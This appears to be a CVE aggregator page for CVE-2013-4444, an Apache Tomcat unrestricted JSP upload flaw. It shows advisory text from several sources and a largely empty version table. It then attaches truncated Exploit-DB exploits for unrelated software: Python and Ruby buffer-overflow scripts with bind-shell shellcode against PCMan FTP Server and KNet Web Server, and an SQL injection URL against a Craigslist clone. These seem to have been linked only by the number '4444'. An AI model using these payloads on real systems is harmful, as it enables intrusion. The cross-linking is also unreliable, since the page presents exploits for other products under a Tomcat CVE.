CVE-2013-4444
published 2014-09-12CVE-2013-4444: Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX…
PriorityP350medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EPSS
13.99%
96.1th percentile
Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.
Affected
35 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | tomcat | <= 7.0.39 | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
| apache | tomcat | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Apache Tomcat Unrestricted file upload vulnerability
osv·2022-05-13
CVE-2013-4444 [MEDIUM] Apache Tomcat Unrestricted file upload vulnerability
Apache Tomcat Unrestricted file upload vulnerability
Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.
GHSA
Apache Tomcat Unrestricted file upload vulnerability
ghsa·2022-05-13
CVE-2013-4444 [MEDIUM] CWE-94 Apache Tomcat Unrestricted file upload vulnerability
Apache Tomcat Unrestricted file upload vulnerability
Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.
OSV
CVE-2013-4444: Unrestricted file upload vulnerability in Apache Tomcat 7
osv·2014-09-12·CVSS 6.8
CVE-2013-4444 [MEDIUM] CVE-2013-4444: Unrestricted file upload vulnerability in Apache Tomcat 7
Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.
Red Hat
tomcat: remote code execution via uploaded JSP
vendor_redhat·2014-09-10·CVSS 7.5
CVE-2013-4444 [HIGH] tomcat: remote code execution via uploaded JSP
tomcat: remote code execution via uploaded JSP
Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.
Statement: Not Vulnerable. This issue did not affect the versions of Tomcat and JBoss Web as shipped with any Red Hat product, as this flaw was handled by Red Hat as CVE-2013-2185. This flaw is to be considered a duplicate of CVE-2013-4444.
Package: tomcat6 (Red Hat Enterprise Linux 6) - Not affected
Package: tomcat (Red Hat Enterprise Linux 7) - Not affected
Package: jbossweb (Red Hat JBoss Data Grid 6) - Not affected
Package: jbossweb (Red Hat JBoss Data Virtualization 6) - Not affecte
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
exploitdb·2015-08-29
CVE-2013-4730 PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
# Date: 29 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3
import socket
import sys
# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
shellcode = (
"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f"
"\x59\x45\xa7\x18\xa0\x3
Exploit-DB
PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
exploitdb·2015-02-14
CVE-2013-4730 PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
---
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
# Date : 12/02/2015
# Author: R-73eN
# Software: PCMan FTP Server v2.0.7
# Tested On Windows Xp SP3
import socket
#348 Bytes Bind Shell Port TCP/4444
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4
Exploit-DB
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
print "USAGE: %s host " % argv[0]
exit(1)
else:
#store command line arguments
script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
shellcode = ( # BIND SHELL | PORT 4444
"\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x
Exploit-DB
PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
print "USAGE: %s host " % argv[0]
exit(1)
else:
#store command line arguments
script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
shellcode = ( # BIND SHELL | PORT 4444
"\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
Exploit-DB
Craigslist Gold - SQL Injection
exploitdb·2013-05-06
Craigslist Gold - SQL Injection
Craigslist Gold - SQL Injection
---
# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability
# Date: 04/05/2013
# Author: Fallaga
# Team: FaLLaGa Tunisian Hackers
#Script url:
http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html
# Version: N/A
# Tested on: Demo
# CVE : ()
############################################################
#######################
#########################[ EXPL0!T ]#########################
http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads--
#############################SwT 4 Ever##########################
####################
@JaMbA !! GreeTz: Fallaga Team + all tunisian people
Exploit-DB
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
exploitdb·2013-03-29
CVE-2005-0575 KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
---
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
sc_bind =
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\
Bugzilla
CVE-2013-4444 tomcat: remote code execution via uploaded JSP [epel-6]
bugzilla·2014-09-10·CVSS 7.5
CVE-2013-4444 [HIGH] CVE-2013-4444 tomcat: remote code execution via uploaded JSP [epel-6]
CVE-2013-4444 tomcat: remote code execution via uploaded JSP [epel-6]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
epel-6 tracking bug for tomcat: see blocks bug list for ful
Bugzilla
CVE-2013-4444 tomcat: remote code execution via uploaded JSP
bugzilla·2014-09-10·CVSS 6.8
CVE-2013-4444 [MEDIUM] CVE-2013-4444 tomcat: remote code execution via uploaded JSP
CVE-2013-4444 tomcat: remote code execution via uploaded JSP
As reported fixed in Apache Tomcat 7.0.40 [1]:
In very limited circumstances, it was possible for an attacker to upload a malicious JSP to a Tomcat server and then trigger the execution of that JSP. While Remote Code Execution would normally be viewed as a critical vulnerability, the circumstances under which this is possible are, in the view of the Tomcat security team, sufficiently limited that this vulnerability is viewed as important.
For this attack to succeed all of the following requirements must be met:
1. Using Oracle Java 1.7.0 update 25 or earlier (or any other Java implementation where java.io.File is vulnerable to null byte injection).
2. A web application must be deployed to a vulnerable version of Tomcat.
3. Th
http://archives.neohapsis.com/archives/bugtraq/2014-09/0075.htmlhttp://marc.info/?l=bugtraq&m=144498216801440&w=2http://openwall.com/lists/oss-security/2014/10/24/12http://seclists.org/fulldisclosure/2021/Jan/23http://tomcat.apache.org/security-7.htmlhttp://www.debian.org/security/2016/dsa-3447http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.htmlhttp://www.securityfocus.com/bid/69728http://www.securitytracker.com/id/1030834https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04851013http://archives.neohapsis.com/archives/bugtraq/2014-09/0075.htmlhttp://marc.info/?l=bugtraq&m=144498216801440&w=2http://openwall.com/lists/oss-security/2014/10/24/12http://seclists.org/fulldisclosure/2021/Jan/23http://tomcat.apache.org/security-7.htmlhttp://www.debian.org/security/2016/dsa-3447http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.htmlhttp://www.securityfocus.com/bid/69728http://www.securitytracker.com/id/1030834https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04851013
2014-09-12
Published